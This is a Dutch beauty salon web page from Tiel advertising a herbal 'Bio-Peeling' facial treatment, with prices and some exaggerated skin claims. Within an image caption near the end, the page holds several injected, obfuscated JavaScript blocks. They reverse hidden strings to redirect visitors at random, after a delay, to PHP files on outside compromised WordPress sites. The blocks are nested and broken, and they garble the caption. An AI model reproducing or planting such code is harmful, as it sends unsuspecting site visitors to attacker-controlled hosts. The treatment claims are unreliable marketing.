Bio-Peeling

Een nieuwe huid door een 100% biologische Chinese kruiden therapie binnen 10 dagen. De Bio-Peeling is bij onze schoonheidssalon een groot succes en is onze bestverkochte (bio) peeling. De Bio-Peeling is gebaseerd op Chinese kruiden met een combinatie van algen, puur natuurlijke planten ingrediënten en essentiële oliën. De kruiden van de Bio-Peeling worden eerst verwarmd en dan in de huid gemasseerd. Daarna wordt de huid verrijkt met de werkstof perfluorcarbon die diep in de huid samenwerkt met de kruiden en de huid voorziet van zuurstof dat belangrijk is voor de versnelde celdelingsprocessen die de komende uren plaats gaan vinden. De Bio-Peeling zorgt ervoor dat de celdeling van de huid versneld: 10 dagen in plaats van 28 dagen. Hierdoor wordt het cel metabolisme van de huid en de productie van collageen gestimuleerd. De Bio-Peeling is zeer geschikt voor: onzuivere vette huid met mee-eters, grove poriën, acnérosacea, acne littekens, littekens, pigmentvlekken, rimpels en huid-veroudering of een slechte conditie van de huid, slecht doorbloede en rokershuid.

Huidproblemen intensief aanpakken

De Bio-Peeling is toepasbaar als eenmalige behandeling of in plaats van uw gewone schoonheidsbehandeling (preventieve werking) of in kuurverband-3 maal binnen 10 tot 15 dagen afhankelijk van het gewenste doel. De Bio-Peeling behandeling kunt u het beste eenmaal in de 6 weken bijhouden. Vanwege de krachtige werking van de Bio-Peeling is het aan te raden om ook thuis de producten te gebruiken de afgestemd zijn op uw huidtype, zo krijgt u het beste resultaat.

De Bio-Peeling is geschikt voor alle huidtypen. Zowel voor dames als heren, ook zeer geschikt voor de donkere getinte huid. Toepasbaar het hele jaar door. Behandeling is preventief eenmalig toe te passen of als een kuur.

Bio-Peeling Treatment
€ 86,35

Prijs per behandeling

€ 86,35
Bio-Peeling Treatment Kuur
€ 231,00

Prijs voor 3 behandelingen
3 behandelingen in Max. 2 weken.

€ 231,00

Vraag onze schoonheidsspecialiste voor meer informatie over deze huid verbeterende behandeling.

We hopen u snel te zien bij Schoonheidssalon Puur Tiel.

De schoonheidsspecialiste in Tiel

Young Model Woman with Skin Problem and Clear Skin Face Closeup Portrait. Unhealthy and Healthy Skin After Treatment. Facial Treatment, Medicine and Cosme<script>$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-re<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslat<script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script><script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>tology Concept

Acne behandeling

Comparison portrait of a woman with problematic skin without and with makeup

Acne intensief

beautiful woman relaxing with herbal face mask

Bio-peeling

Mature Woman having relaxing head and face massage

Bindweefselmassage